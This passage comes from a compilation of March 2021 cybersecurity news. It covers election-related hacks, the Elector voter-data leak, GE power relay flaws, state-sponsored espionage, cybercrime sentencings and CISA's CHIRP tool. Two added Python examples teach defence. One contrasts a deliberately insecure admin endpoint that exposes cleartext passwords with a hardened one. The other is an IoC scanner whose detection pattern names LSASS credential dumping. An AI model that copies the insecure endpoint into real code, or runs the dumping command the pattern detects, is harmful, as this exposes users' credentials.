• Only use secure networks and avoid using public Wi-Fi networks. Consider installing and using a VPN.
“The FBI does not encourage paying ransoms. Payment does not guarantee files will be recovered. It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities,” the FBI concludes.
US Cyber Experts Conducted Operations to Safeguard Election
26.3.2021 BigBrothers Securityweek
The U.S. Cyber Command conducted more than two dozen operations aimed at preventing interference in last November’s presidential election, the general who leads the Pentagon’s cyber force said Thursday.
Gen. Paul Nakasone, in prepared remarks to the Senate Armed Services Committee, did not describe those operations, so it was not immediately clear whether these were efforts strictly at defending the United States against intrusions or offensive measures to shut down intruders. He said his command’s operations were designed “to get ahead of foreign threats before they interfered with or influenced our elections in 2020.”
A U.S. intelligence assessment released last week said that neither Russia nor any other nation manipulated votes or conducted cyberattacks that affected the outcome of the vote.
Nakasone’s appearance before the committee comes as the U.S. is grappling with major cyber intrusions, including a breach by Russian hackers that exploited supply chain vulnerabilities to access federal government agencies and private companies.
Nakasone said Cyber Command and the National Security Agency are helping plan the Biden administration’s response to the SolarWinds intrusion and that “policymakers are considering a range of options, including costs that might be imposed by other elements of our government.”
Separately, the U.S. is responding to a breach that affected thousands of users of Microsoft’s email server software.
Chinese Hackers Used Facebook to Hack Uighur Muslims Living Abroad
26.3.2021 BigBrothers Thehackernews
Facebook may be banned in China, but the company on Wednesday said it has disrupted a network of bad actors using its platform to target the Uyghur community and lure them into downloading malicious software that would allow surveillance of their devices.
"They targeted activists, journalists and dissidents predominantly among Uyghurs from Xinjiang in China primarily living abroad in Turkey, Kazakhstan, the United States, Syria, Australia, Canada and other countries," Facebook's Head of Cyber Espionage Investigations, Mike Dvilyanski, and Head of Security Policy, Nathaniel Gleicher, said. "This group used various cyber espionage tactics to identify its targets and infect their devices with malware to enable surveillance."
The social media giant said the "well-resourced and persistent operation" aligned with a threat actor known as Evil Eye (or Earth Empusa), a China-based collective known for espionage attacks against the Muslim minority in the country since at least August 2019, using "strategically compromised websites" to exploit iOS and Android devices and to gain access to victims' Gmail accounts.
The disclosures come days after the European Union, U.K., U.S., and Canada jointly announced sanctions against several senior officials in China over human rights abuses against Uyghurs in the Chinese province of Xinjiang.
Evil Eye is said to have resorted to a multifaceted approach to stay under the radar and conceal its malicious intent, posing as journalists, students, human rights advocates, or members of the Uyghur community to build trust with targeted victims before drawing them into clicking on malicious links.
Besides social engineering efforts, the collective leveraged a network of malware-infested websites, both legitimately compromised websites and lookalike domains for popular Uyghur and Turkish news sites, that were used as a watering hole to attract and selectively infect iPhone users based on certain technical criteria, including IP address, operating system, browser, country, and language settings.
"Some of these web pages contained malicious JavaScript code that resembled previously reported exploits, which installed iOS malware known as INSOMNIA on people's devices once they were compromised," the company noted. Insomnia comes with capabilities to exfiltrate data from a variety of iOS apps, such as contacts, location, and iMessage, as well as third-party messaging clients from Signal, WhatsApp, Telegram, Gmail, and Hangouts.
Separately, Evil Eye also set up lookalike third-party Android app stores to publish trojanized Uyghur-themed applications such as a keyboard app, prayer app, and dictionary app, which served as a conduit to deploy two Android malware strains, ActionSpy and PluginPhantom. Further investigation into the Android malware families linked the attack infrastructure to two Chinese companies, Beijing Best United Technology Co., Ltd. (Best Lh) and Dalian 9Rush Technology Co., Ltd. (9Rush).
"These China-based firms are likely part of a sprawling network of vendors, with varying degrees of operational security," the researchers noted.
In a series of countermeasures, the company said it blocked the malicious domains in question from being shared on its platform, disabled the offending accounts, and notified about 500 people who were targeted by the adversary.
This is not the first time Facebook has outed technology firms that operate as a front for state-sponsored hacking activities. In December 2020, the social network formally linked OceanLotus to an information technology company called CyberOne Group located in Vietnam.
A day before elections, hackers leaked details of millions of Israeli voters
25.3.2021 BigBrothers Securityaffairs
Hackers have exposed personal and voter registration details of over 6.5 million Israeli voters, less than 24 hours before the election.
A few hours before the election in Israel, hackers exposed the voter registration and personal details of millions of citizens. The source of the data appears to be Elector, an app developed by the software firm Elector Software for the Israeli political party Likud.
Exposed data include residential addresses, phone numbers, and dates of birth of registered voters, and appear to come from a leak that took place a year ago. However, media reported that at least one file includes people’s full names and their assigned polling stations, updated for the current voting round.
“The data was exposed after hackers made threats last week against Elector Software Ltd., the operators of the voter-prompting Elector App, which is used by the ruling Likud party and several others.” reported Calcalist. “The threats, some of which were sent directly to the company, included warnings that the attackers would leak data that was allegedly stolen from the app, as well as personal information on the company’s CEO Tzur Yemin, and his family unless the app ceases operating. “This is an extortion attempt and I have filed a complaint to the police,” Tzur told Calcalist.”
The hackers initially shared links to download the data they claimed to have stolen. The files were encrypted, and the threat actors threatened to distribute the password unless use of the Elector app was discontinued.
“The passwords will be distributed in the coming days if they choose to continue lying,” the attackers wrote. “You don’t have long left until information about your family is exposed too.”
Earlier this week, the hackers released the password via websites that don’t require registration, allowing anyone to access the data. The attackers, identified as “The Israeli Autumn,” declared they were “forced” to release the information because the authorities had failed to deal with Elector.
Exposed files included the names and ballot numbers of all 6,528,565 eligible voters and the personal details of over 3 million Israeli citizens (full names, phone numbers, ID card numbers, home addresses, gender, age, and political preferences).
In February, a misconfiguration in an election day app developed for Netanyahu’s Likud party had already exposed personal details of over 6.5 million Israelis. The incident was reported by Verizon Media developer Ran Bar-Zik, and several Israeli media ([1], [2], [3], [4]) confirmed the data leak.
Bar-Zik discovered the huge trove of data while performing a security audit of the Elector app.
“Netanyahu is actually sending Likud activists into a serious security breach, one of the most serious that has been exposed in recent years in Israel.” reads the post published by Calcalist. “Because a major security failure in Elector’s app and system revealed all the Likud’s voter data ahead of the upcoming elections: a huge database of voters and containing up-to-date personal information – ID, full name, address, and phone – of close to 6.5 million Israelis with voting rights.”
It is not clear whether the leaked information was also accessed by unauthorized parties before the flaw was discovered, but the recent leak may confirm that it was.
Analysis of the app’s source code revealed a link to an API endpoint used to authenticate the site’s administrators.
The expert pointed out that the API did not require any authentication: anyone could query it and receive the site administrators’ data in cleartext, including their passwords. Two separate defects are stacked here: the endpoint itself was unauthenticated, and the passwords behind it were stored and returned in cleartext rather than as salted hashes.
With those credentials, Bar-Zik was able to access the site’s backend, including a database containing the personal details of 6,453,254 Israeli citizens.
The database was an official and up-to-date copy of Israel’s voter registry, which each party receives and manages before the election.
Following the discovery of the data leak, the official website of the Elector app was taken down.
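The two defects stacked in that endpoint, an unauthenticated admin lookup and cleartext password storage, are easy to reproduce in a handful of lines. The following Python is an added example, not Elector's code: the admin store, the token, the field names and the framework-free request shape (a plain dict) are all constructed. It places the vulnerable handler beside a hardened one that requires a bearer token compared in constant time, keeps only salted PBKDF2 hashes, and never returns credential material, hashed or not, to the caller.

```python
"""Added example (not Elector's code): an unauthenticated admin lookup that
returns cleartext passwords, next to a hardened version of the same endpoint."""
import hashlib
import hmac
import json
import os

PBKDF2_ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor

# Constructed admin store in the shape the audit describes: cleartext passwords.
ADMINS_CLEARTEXT = {
    "admin": {"password": "hunter2", "role": "site_admin"},
}


def vulnerable_admin_endpoint(request):
    """Vulnerable: no authentication, and the response carries every password."""
    # `request` is a constructed dict standing in for a framework request object.
    return 200, json.dumps(ADMINS_CLEARTEXT)


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256; the salt is stored beside the hash."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return {"salt": salt.hex(), "hash": digest.hex()}


def verify_password(record, password):
    """Recompute and compare in constant time; a stolen record alone is useless."""
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(record["salt"]), PBKDF2_ITERATIONS)
    return hmac.compare_digest(digest.hex(), record["hash"])


def build_hashed_store(cleartext_store):
    """Migrate a cleartext store into one that holds only role and hash material."""
    return {user: {"role": rec["role"], **hash_password(rec["password"])}
            for user, rec in cleartext_store.items()}


def hardened_admin_endpoint(request, store, api_token):
    """Hardened: bearer-token check first, then a response with no credential material."""
    presented = request.get("headers", {}).get("Authorization", "")
    expected = "Bearer " + api_token
    # Constant-time comparison so the token cannot be recovered byte by byte via timing.
    if not hmac.compare_digest(presented.encode(), expected.encode()):
        return 401, json.dumps({"error": "unauthorized"})
    # Only non-secret fields leave the server: no password, no hash, no salt.
    public_view = {user: {"role": rec["role"]} for user, rec in store.items()}
    return 200, json.dumps(public_view)


if __name__ == "__main__":
    token = "constructed-example-token"
    store = build_hashed_store(ADMINS_CLEARTEXT)
    print(vulnerable_admin_endpoint({}))
    print(hardened_admin_endpoint({}, store, token))
    print(hardened_admin_endpoint({"headers": {"Authorization": "Bearer " + token}}, store, token))
```

The hardened handler answers the audit's two findings independently: even a caller who does obtain the token learns only roles, so a future authentication bypass would no longer hand out passwords.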
CISA is warning of vulnerabilities in GE Power Management Devices
24.3.2021 BigBrothers Securityaffairs
U.S. Cybersecurity & Infrastructure Security Agency (CISA) warns of flaws in GE Power Management Devices that could allow an attacker to conduct multiple malicious activities on vulnerable systems.
U.S. Cybersecurity & Infrastructure Security Agency (CISA) warns of vulnerabilities in GE Power Management Devices that could be exploited by an attacker to conduct multiple malicious activities on systems belonging to the Universal Relay (UR) family.
The flaws could be exploited to access sensitive information, reboot the device, trigger a denial-of-service condition, and gain privileged access.
The types of vulnerabilities affecting the devices are Inadequate Encryption Strength, Session Fixation, Exposure of Sensitive Information to an Unauthorized Actor, Improper Input Validation, Unrestricted Upload of File with Dangerous Type, Insecure Default Variable Initialization, Use of Hard-coded Credentials.
“Successful exploitation of these vulnerabilities could allow an attacker to access sensitive information, reboot the UR, gain privileged access, or cause a denial-of-service condition.” reads the alert published by CISA.
GE’s UR devices are protective relays used to protect and control power system equipment such as buses, feeders, lines, transformers and generators. Affected UR families are B30, B90, C30, C60, C70, C95, D30, D60, F35, F60, G30, G60, L30, L60, L90, M60, N60, T35, T60. The vendor has released firmware updates for all of them, urges customers to update their installations, and has also published mitigations to address the flaws.
“GE strongly recommends users with impacted firmware versions update their UR devices to UR firmware Version 8.10, or greater to resolve these vulnerabilities. GE provides additional mitigations and information about these vulnerabilities in GE Publication Number: GES-2021-004 (login required).” continues the alert.
The most severe issue addressed by the vendor is a critical “Insecure Default Variable Initialization” flaw tracked as CVE-2021-27426 and rated with a CVSS v3 base score of 9.8 out of 10.
“UR IED with “Basic” security variant does not allow the disabling of the “Factory Mode,” which is used for servicing the IED by a “Factory” user.” reads the advisory for this flaw.
The vulnerability could be exploited by a remote attacker to bypass security restrictions.
“GE UR family could allow a remote attacker to bypass security restrictions, caused by insecure default variable initialization in UR IED. By sending a specially-crafted request, an attacker could exploit this vulnerability to bypass access restrictions.” reads the advisory published by IBM X-Force.
Another high-severity issue addressed by the vendor is a “Use of Hard-coded Credentials” flaw tracked as CVE-2021-27430, which received a CVSS score of 8.4.
“UR bootloader binary Version 7.00, 7.01 and 7.02 included unused hardcoded credentials. Additionally, a user with physical access to the UR IED can interrupt the boot sequence by rebooting the UR.” continues the advisory.
GE also addressed a high-severity issue, an EXPOSURE OF SENSITIVE INFORMATION TO AN UNAUTHORIZED ACTOR, tracked as CVE-2021-27422 and rated with a CVSS v3 base score of 7.5.
“Web server interface is supported on UR over HTTP protocol. It allows sensitive information exposure without authentication.” continues the alert.
GE recommends the implementation of network defense-in-depth practices to protect UR IED, including placing UR IED inside the control system network security perimeter, and having access controls, monitoring (such as an Intrusion Detection System), and other mitigating technologies in place.
“CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities.” states CISA. “Specifically, users should:
Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.”
CISA Warns of Security Flaws in GE Power Management Devices
23.3.2021 BigBrothers Threatpost
The flaws could allow an attacker to access sensitive information, reboot the UR, gain privileged access, or cause a denial-of-service condition.
The U.S. Cybersecurity & Infrastructure Security Agency (CISA) is warning of critical-severity security flaws in GE’s Universal Relay (UR) family of power management devices.
GE’s UR devices are the “basis of simplified power management for the protection of critical assets,” according to the company. They are protective relays: intelligent electronic devices (IEDs) that monitor current and voltage on power system equipment such as buses, feeders, lines, transformers and generators, and trip breakers when a fault is detected. GE has issued patches for the following affected UR device families: B30, B90, C30, C60, C70, C95, D30, D60, F35, F60, G30, G60, L30, L60, L90, M60, N60, T35 and T60.
CISA warned that if not updated, the affected products could be exploited to allow an attacker to access sensitive information, reboot the UR, gain privileged access, or cause a denial-of-service condition.
Given that the devices sit in the protection path of electrical power equipment, the impact of these flaws is heightened: “GE strongly recommends users with impacted firmware versions update their UR devices to UR firmware Version 8.10, or greater to resolve these vulnerabilities,” according to CISA’s alert last week.
GE Security Flaws
Overall, nine vulnerabilities were patched across the affected devices. The most serious of these (CVE-2021-27426) has a CVSS score of 9.8 out of 10, making it critical. The flaw stems from insecure default variable initialization. According to an IBM security alert, an affected GE UR family could allow a remote attacker to bypass security restrictions, stemming from insecure default variable initialization in the UR Intelligent Electronic Device (IED) component.
“By sending a specially-crafted request, an attacker could exploit this vulnerability to bypass access restrictions,” according to IBM. According to GE, the flaw is remotely exploitable and requires a “low skill level to exploit.”
Another high-severity issue (CVE-2021-27430) stems from the fact that the UR bootloader binary in versions 7.00, 7.01 and 7.02 includes hardcoded credentials. According to IBM, a local attacker could exploit this vulnerability to interrupt the boot sequence by rebooting the UR. The flaw ranks 8.4 on the CVSS scale, making it high-severity.
“Additionally, a user with physical access to the UR IED can interrupt the boot sequence by rebooting the UR,” said CISA.
Another high-severity issue (CVE-2021-27422) is that the web server interface of the affected devices is served over plain HTTP, allowing sensitive information exposure without authentication, the researchers said.
Finally, researchers found that a flaw in the web-based UR Setup configuration tool (CVE-2021-27428) of the affected UR families could allow a remote attacker to upload arbitrary files.
“By sending a specially-crafted request, a remote attacker could exploit this vulnerability to upgrade firmware without appropriate privileges,” according to an IBM advisory.
Security Updates: Patch Now
According to reports, the flaws were first found in July – and the UR firmware version addressing the flaws (version 8.10) was pushed out on Dec. 24. SCADA-X, DOE’s Cyber Testing for Resilient Industrial Control Systems (CyTRICS) program, Verve Industrial, and VuMetric reported these flaws to GE.
However, after public disclosure of the flaws last week CISA is now urging end users to update their UR devices. No known public exploits for the vulnerabilities have been discovered yet, noted CISA.
“GE recommends protecting UR IED by using network defense-in-depth practices,” according to CISA’s alert. “This includes, but is not limited to, placing UR IED inside the control system network security perimeter, and having access controls, monitoring (such as an Intrusion Detection System), and other mitigating technologies in place.”
GE has dealt with security issues before. In December, a pair of critical vulnerabilities were discovered in dozens of GE Healthcare radiological devices popular in hospitals, which could allow an attacker to gain access to sensitive personal health information (PHI), alter data and even take the machine offline.
Ministry of Defence academy hit by state-sponsored hackers
23.3.2021 BigBrothers Securityaffairs
The Ministry of Defence academy was hit by a major cyber attack; Russian and Chinese state-sponsored hackers are suspected to be behind the offensive.
According to the British tabloid newspaper The Sun, the Ministry of Defence’s academy was hit by a major cyber attack, and Russian and Chinese state-sponsored hackers are suspected to be behind the offensive.
The Defence Academy of the United Kingdom provides higher education for personnel in the British Armed Forces, Civil Service, other government departments and service personnel from other nations. The Defence Academy is headquartered at what used to be the Royal Military College of Science site at Shrivenham in southwestern Oxfordshire; it delivers education and training there and in a number of other sites. The majority of training is postgraduate with many courses being accredited for the award of civilian qualifications.
“THE MoD’s defence academy has been hit by a major cyber attack.” reported The Sun. “Staff were told the hack was by a foreign power, making Russia and China suspects.”
The cyber attack took the academy’s website offline and knocked out its IT network, which is run by a contractor. Systems at the academy were compromised and it will take time to completely restore the affected computers and servers.
“They said it’s the work of a foreign power,” a source told The Sun. “Everyone was told to use their personal laptops and computers because the work ones have been compromised. It is going to take at least five weeks to fix.”
The Ministry of Defence confirmed that it is aware of an issue with the Defence Academy IT systems.
“These are run by a contractor and there is no impact on the Ministry of Defence IT network itself.” announced the Ministry of Defence. “Teaching continues.”
UK Unveils Plan for Smaller, More High-Tech Armed Forces
23.3.2021 BigBrothers Securityweek
Britain plans to cut the size of its army and boost spending on drones, robots and a new “cyber force” under defense plans announced by the government on Monday.
Defense Secretary Ben Wallace said the British Army would shrink from 76,500 soldiers to 72,500 by 2025. He said the army hadn’t been at its “established strength” of 82,500 for several years.
Wallace said the military would no longer be “overstretched and underequipped” and that new investment in equipment, infrastructure and technology “marks a shift from mass mobilization to information age speed, readiness and relevance for confronting the threats of the future.”
Wallace said the armed forces “will no longer be held as a force of last resort, but become more present and active around the world.”
Britain is the second-biggest military spender in NATO, after the United States. In November the government announced a 16.5 billion-pound ($23 billion) increase in defense spending over the next four years, focusing on the future battlefields of space and cyber rather than traditional resources such as army troops.
Prime Minister Boris Johnson said Monday that the reforms would give the military “the kit now that they will need to make themselves all the more useful, all the more, I’m afraid, lethal, and effective around the world.”
“Therefore, all the more valuable to our allies, and all the more deterring to our foes.”
Defense of Convicted Cypriot Hacker in US Not Seeking Appeal
23.3.2021 BigBrothers Securityweek
A lawyer for a Cypriot hacker who has served almost four years behind bars said he will not appeal against a one-year jail sentence in the US for cyber-crimes he committed as a minor.
A Georgia court handed down the jail term on Thursday in the trial of Joshua Pelloso Epifaniou, now 22, who was arrested in Cyprus in May 2017 and last year became the first Cypriot national ever extradited to the United States.
“This historic extradition and sentencing would not have been possible without the determination of our FBI investigators and the help of our federal and foreign partners,” Chris Hacker, an FBI Special Agent in Atlanta, Georgia, said in a Department of Justice statement.
"It is further proof that no matter where criminals who prey on US companies and citizens are hiding, either geographically or virtually, we will pursue them and bring them to justice,” Hacker said.
Cyprus-based lawyer Michael Chambers, in an email to AFP, said an appeal would not be filed although Epifaniou had confessed and was expecting to be freed on time served.
“I do not believe that the sentence is worth appealing against as he will be released in 10 months,” said Chambers.
The Cypriot’s legal team had hoped Epifaniou would be released as he had pleaded guilty and paid compensation.
Epifaniou pleaded guilty to federal computer fraud charges brought in Arizona and Georgia.
As a result of the conviction, Epifaniou forfeited $389,113 and €70,000 ($83,000) to the government and paid $600,000 in restitution to his fraud victims, on the back of his cryptocurrency takings.
Epifaniou was extradited last July 16 to face charges for crimes committed at night from his bedroom in his mother's Nicosia home as a teenager.
The maximum sentence for the charges he faced was 20 years.
Between October 2014 and May 2017, Epifaniou hacked websites and monitored online traffic to identify extortion targets.
After selecting target websites, he worked with co-conspirators to steal information from the websites’ databases.
Epifaniou then used proxy servers located in foreign countries to log into email accounts and send messages to the websites threatening to leak the sensitive data unless a ransom was paid in bitcoins, which have since shot up in value.
Initially arrested in Nicosia at the age of 17, he spent more than three years in a Cypriot jail without being convicted and fighting extradition.
His Filipina mother Vivina Polloso, a supermarket employee, has expressed heartbreak at his treatment, especially after he was whisked out of the country after a brief and tearful farewell at the island's international airport in the midst of the coronavirus crisis.
"They deprived him of his youth, he became an adult in prison," his mother said.
US Sentences Russian, North Macedonian in Cyber Fraud Case
23.3.2021 BigBrothers Securityweek
The United States sentenced a Russian and a North Macedonian on Friday to prison for their roles in a vast cyber crime operation.
Sergey Medvedev, 33, of Russia and Marko Leopard, 31, of North Macedonia, were sentenced to ten and five years respectively, according to a Justice Department statement.
Both had previously pleaded guilty to criminal conspiracy in federal court in Nevada.
Medvedev, arrested in Thailand in 2018, co-founded the "Infraud Organization," a marketplace for "counterfeit documents, stolen bank account and credit account information, and stolen personal identifying information," authorities said.
Under the slogan "In Fraud We Trust," the network -- which had more than 10,000 members at its peak -- was one of the top places to buy stolen information, leading to losses of more than $568 million.
Leopard joined the network in 2011 and hosted websites for Infraud members who wished to sell illegal goods and services online, authorities said.
"Today's sentences should serve as a warning to any web host who willingly looks the other way for a quick buck -- and that the United States will hold these bad actors accountable, even when they operate behind a computer screen halfway across the world," Acting Assistant Attorney General Nicholas McQuaid said.
CISA releases CHIRP, a tool to detect SolarWinds malicious activity
22.3.2021 BigBrothers Securityaffairs
US CISA has released a new tool that allows detecting malicious activity associated with the SolarWinds hackers in compromised on-premises enterprise environments.
US CISA has released the CISA Hunt and Incident Response Program (CHIRP), a Python-based tool for detecting malicious activity associated with the SolarWinds hackers in compromised on-premises enterprise Windows environments. Below is an excerpt of CISA’s announcement:
“This Alert announces the CISA Hunt and Incident Response Program (CHIRP) tool. CHIRP is a forensics collection tool that CISA developed to help network defenders find indicators of compromise (IOCs) associated with activity detailed in the following CISA Alerts:”
AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations, which primarily focuses on an advanced persistent threat (APT) actor’s compromise of SolarWinds Orion products affecting U.S. government agencies, critical infrastructure entities, and private network organizations.
AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments, which addresses APT activity within Microsoft 365/Azure environments and offers an overview of—and guidance on—available open-source tools. The Alert includes the CISA-developed Sparrow tool that helps network defenders detect possible compromised accounts and applications in the Azure/M365 environment.
Both alerts are related to SolarWinds attacks against government agencies, critical infrastructure, and private sector organizations.
This isn’t the first tool released by US CISA to detect indicators of compromise in Microsoft environments: earlier this year the agency’s Cloud Forensics team released Sparrow, a PowerShell-based tool that helps administrators detect anomalies and potentially malicious activity in Azure/Microsoft 365 environments.
Like Sparrow, CHIRP scans for signs of APT compromise, but within an on-premises environment; by default it searches for IOCs associated with the malicious activity detailed in alerts AA20-352A and AA21-008A.
The CHIRP tool lets defenders examine Windows event logs for artifacts associated with this activity, check the Windows Registry for evidence of intrusion, query Windows network artifacts, and apply YARA rules to detect malware, backdoors, or implants.
“The CISA Hunt and Incident Response Program (CHIRP) is a tool created to dynamically query Indicators of Compromise (IoCs) on hosts with a single package, outputting data in a JSON format for further analysis in a SIEM or other tool. CHIRP does not modify any system data.” reads the description provided on GitHub for the tool.
“The initial IoCs are intended to search for activity detailed in CISA Alert AA21-008A that has spilled into the enterprise environment.”
Currently, the tool scans for:
The presence of malware identified by security researchers as TEARDROP and RAINDROP;
Credential dumping certificate pulls;
Certain persistence mechanisms identified as associated with this campaign;
System, network, and M365 enumeration; and
Known observable indicators of lateral movement.
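To show the shape of what CHIRP does (query host artifacts against an IoC set, emit JSON for a SIEM, change nothing on the host), here is an added Python example that is not CISA's code: it matches constructed Windows event records (service installations, Event ID 7045, and process creations, Event ID 4688) against a small indicator set. Every indicator, service name, file name and event record below is constructed for the example and is not one of the real SolarWinds-campaign IoCs; the LSASS dump pattern is only illustrative of the credential-dumping class the tool looks for.

```python
"""Added example: a CHIRP-style query of host event records against an IoC set.
Not CISA's code. All indicators and events below are constructed placeholders."""
import json
import re

# Constructed IoC set: CHIRP ships its own; these only show the shape of one.
IOC_SET = {
    "file_names": {"evil_loader.dll"},      # hypothetical implant DLL
    "service_names": {"updatersvc"},        # hypothetical persistence service
    "command_line_patterns": [
        # Illustrative LSASS memory-dump pattern for the credential-dumping class.
        re.compile(r"procdump.*\blsass\b", re.IGNORECASE),
    ],
}

# Constructed event records in the shape an EVTX parser would yield (sample data).
SAMPLE_EVENTS = [
    {"EventID": 7045, "Channel": "System", "ServiceName": "UpdaterSvc",
     "ImagePath": r"C:\Windows\Temp\svc.exe", "TimeCreated": "2021-03-01T10:00:00Z"},
    {"EventID": 4688, "Channel": "Security", "NewProcessName": r"C:\Tools\procdump64.exe",
     "CommandLine": "procdump64.exe -ma lsass.exe out.dmp", "TimeCreated": "2021-03-01T10:05:00Z"},
    {"EventID": 4688, "Channel": "Security", "NewProcessName": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\ProgramData\evil_loader.dll,Start",
     "TimeCreated": "2021-03-01T10:06:00Z"},
    {"EventID": 4688, "Channel": "Security", "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe", "TimeCreated": "2021-03-01T10:07:00Z"},  # benign, must not match
]


def _hit(kind, event, indicator):
    """One finding, carrying the full record so an analyst can pivot on it later."""
    return {"kind": kind, "indicator": indicator, "event_id": event["EventID"],
            "time": event.get("TimeCreated"), "record": event}


def scan_events(events, iocs=IOC_SET):
    """Read-only pass over parsed event records; returns a list of findings."""
    hits = []
    for event in events:
        event_id = event.get("EventID")
        if event_id == 7045:
            # Persistence: a newly installed service whose name is on the indicator list.
            if event.get("ServiceName", "").lower() in iocs["service_names"]:
                hits.append(_hit("persistence.service_install", event, event["ServiceName"]))
        elif event_id == 4688:
            command_line = event.get("CommandLine", "")
            # Credential dumping: command-line patterns.
            for pattern in iocs["command_line_patterns"]:
                if pattern.search(command_line):
                    hits.append(_hit("credential_access.command_line", event, pattern.pattern))
            # Known-bad file names referenced by a process.
            for name in iocs["file_names"]:
                if name in command_line.lower():
                    hits.append(_hit("malware.file_name", event, name))
    return hits


def to_json(hits):
    """JSON output, one document, ready to post to a SIEM or read with jq."""
    return json.dumps(hits, indent=2)


if __name__ == "__main__":
    print(to_json(scan_events(SAMPLE_EVENTS)))
```

The scanner only reads the records it is given and returns findings rather than mutating anything, mirroring the "does not modify any system data" property CISA states for CHIRP; a real deployment would feed it parsed EVTX records and extend the IoC set with the indicators from the alerts.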
China Slams US Plan to Expel Phone Carriers in Tech Clash
21.3.2021 BigBrothers Securityweek
China’s government on Thursday called on Washington to drop efforts to expel three state-owned Chinese phone companies from the United States in a new clash over technology and security.
The Federal Communications Commission voted Wednesday to begin revoking the companies’ U.S. licenses. It said they are security risks controlled by the communist Beijing government.
The foreign ministry accused Washington of misusing security complaints to hurt Chinese commercial competitors.
The United States should “stop the wrong practice of generalizing the concept of national security and politicizing economic issues” and “stop abusing state power to unreasonably suppress Chinese enterprises,” said a ministry spokesman, Zhao Lijian.
The decision adds to mounting U.S.-Chinese conflict over the ruling Communist Party’s industrial plans, access to American technology and accusations of computer attacks and theft of business secrets.
President Joe Biden has said he wants better relations with Beijing but has given no indication he will roll back sanctions imposed by his predecessor, Donald Trump, that limit Chinese access to U.S. technology and financial markets.
The latest announcement came as U.S. and Chinese envoys were flying to Alaska for the highest-level face-to-face meeting between the two sides since Biden took office in January.
Zhao said Beijing will “take necessary measures to safeguard the legitimate rights and interests of Chinese enterprises” but gave no details. Officials have issued similar warnings in the past but those usually have resulted in no action.
The latest action targets China Unicom Americas, a unit of China Unicom Ltd.; Pacific Networks Corp. and ComNet (USA) LLC, a unit of Pacific Networks. They sell international voice and data service.
The companies were ordered to explain their ownership and operations, and “failed to address the serious national security threats posed by their continued operation in the U.S.,” said Commissioner Brendan Carr in a statement.
National security officials “advise that traffic on these networks ‘remains subject to exploitation, influence, and control by the Chinese government,’” Carr said. He said some Chinese telecom companies have operated in the United States for decades and “security threats have evolved substantially in the intervening years.”
Earlier, in 2019, state-owned China Mobile Ltd. was blocked from entering the U.S. market on security grounds.
Trump also blocked access to most U.S. technology for telecom equipment giant Huawei Technologies Ltd. and some other Chinese tech companies. Trump issued an order prohibiting Americans from investing in securities of companies deemed by the Pentagon to be linked to China’s military.
Russian National pleads guilty to conspiracy to plant malware on Tesla systems
20.3.2021 BigBrothers Securityaffairs
The Russian national who attempted to convince a Tesla employee to plant malware on Tesla systems has pleaded guilty.
The U.S. Justice Department announced on Thursday that the Russian national Egor Igorevich Kriuchkov (27), who attempted to convince a Tesla employee to install malware on the company’s computers, has pleaded guilty.
“A Russian national pleaded guilty in federal court today for conspiring to travel to the United States to recruit an employee of a Nevada company into a scheme to introduce malicious software into the company’s computer network.” reads a press release published by the DoJ.
In September, Kriuchkov was indicted in the United States for conspiring to recruit a Tesla employee to install malware onto the company’s network.
The man was arrested on August 22 and appeared in court on August 24. Kriuchkov offered $1 million to the unfaithful employee of the US company.
Kriuchkov conspired with other criminals to recruit the employee of an unnamed company in Nevada. At the end of August, Elon Musk confirmed that Russian hackers attempted to recruit an employee to install malware into the network of electric car maker Tesla.
Teslarati confirmed that the employee contacted by the crooks is a Russian-speaking, non-US citizen working at Tesla-owned lithium-ion battery and electric vehicle subassembly factory Giga Nevada.
The Russian man and his co-conspirators were planning to exfiltrate data from the company’s network and blackmail the organization, threatening to leak the stolen data unless it paid a ransom.
A few days after meeting the employee, Kriuchkov revealed his plan, offering him between $500,000 and $1,000,000 for the job. The malware Kriuchkov and his co-conspirators intended to deploy was specifically designed to steal information from Tesla.
The employee decided to warn Tesla and the company reported the attempt to the FBI. The employee had more meetings with Kriuchkov that were surveilled by the FBI. On August 22, the FBI arrested Kriuchkov.
“The swift response of the company and the FBI prevented a major exfiltration of the victim company’s data and stopped the extortion scheme at its inception,” said Acting Assistant Attorney General Nicholas L. McQuaid of the Justice Department’s Criminal Division. “This case highlights the importance of companies coming forward to law enforcement, and the positive results when they do so.”
“This case highlights our office’s commitment to protecting trade secrets and other confidential information belonging to U.S. businesses — which is becoming even more important each day as Nevada evolves into a center for technological innovation,” said Acting U.S. Attorney Christopher Chiou for the District of Nevada. “Along with our law enforcement partners, we will continue to prioritize stopping cybercriminals from harming American companies and consumers.”
“This is an excellent example of community outreach resulting in strong partnerships, which led to proactive law enforcement action before any damage could occur,” said Special Agent in Charge Aaron C. Rouse of the FBI’s Las Vegas Field Office.
Kriuchkov will be sentenced on May 10.
CISA and FBI warn of ongoing TrickBot attacks
20.3.2021 BigBrothers Securityaffairs
CISA and FBI are warning of ongoing TrickBot attacks, even though security firms took down the C2 infrastructure of the infamous botnet in October.
The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) warn of ongoing TrickBot attacks, even though in October multiple security firms dismantled its C2 infrastructure in a joint operation.
On Wednesday, the two US agencies published an advisory to warn organizations of a new wave of attacks conducted by cybercrime actors that are leveraging a traffic infringement phishing scheme to trick victims into installing the TrickBot malware.
